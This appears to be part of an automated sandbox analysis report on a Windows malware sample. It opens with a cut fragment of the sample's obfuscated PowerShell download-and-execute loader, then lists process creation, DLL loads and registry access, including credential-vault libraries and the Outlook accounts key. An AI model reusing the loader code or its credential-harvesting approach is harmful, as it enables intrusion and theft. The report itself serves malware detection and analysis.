i,e.nMt');$Respriser+=$Regr[1];Scance ($Respriser);Scance (Svndyssendes94 'A$ YDm.c,a .UHUeMaPd.e rSsA[ $FsJlIo tRt,i nKgP]d=,$OA,mTbFaSg e,sK7 7 ');$Genlydens=Svndyssendes94 'S$,Y,mTc,a..SD o,w nSl oFa d FSiBl e.(.$FU,d v aSnTd r i nOg.e rSnAeB,f$ PIruoHgAr a m r.eUdHaUk.t r,s )b ';$Programredaktrs=$Regr[0];Scance (Svndyssendes94 ' $ g lTo b a l,: SMaStWeBlSl i tP=,( Tse sAtT-ZPGaDtAh F$DPSr o g rAa mLrAe d,aAk tCrMs ) ');while (!$Satellit) {Scance (Svndyssendes94 'H$Bg lTo,b.a lH: Rie gOi oCn s.p lpaRnvrae t n iBn gBscl i.n.j.e =,$MtCrMuaeu ') ;Scance $Genlydens;Scance (Svndyssendes94 ',S tCa r,t -.Ssl,eOeSp .4N ');Scance (Svndyssendes9 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Snigmyrdede.Sko && echo t"
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: pstorec.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe File opened: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.cfg Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: m.Core.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Automation.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbS(b source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.pdb source: powershell.exe, 00000007.00000002.4567700425.0000000006D69000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tem.Core.pdbd source: powershell.exe, 0000000B.00000002.4570530076.0000000008800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000B.00000002.4564412746.0000000007706000.00000004.00000020.00020000.00000000.sdmp
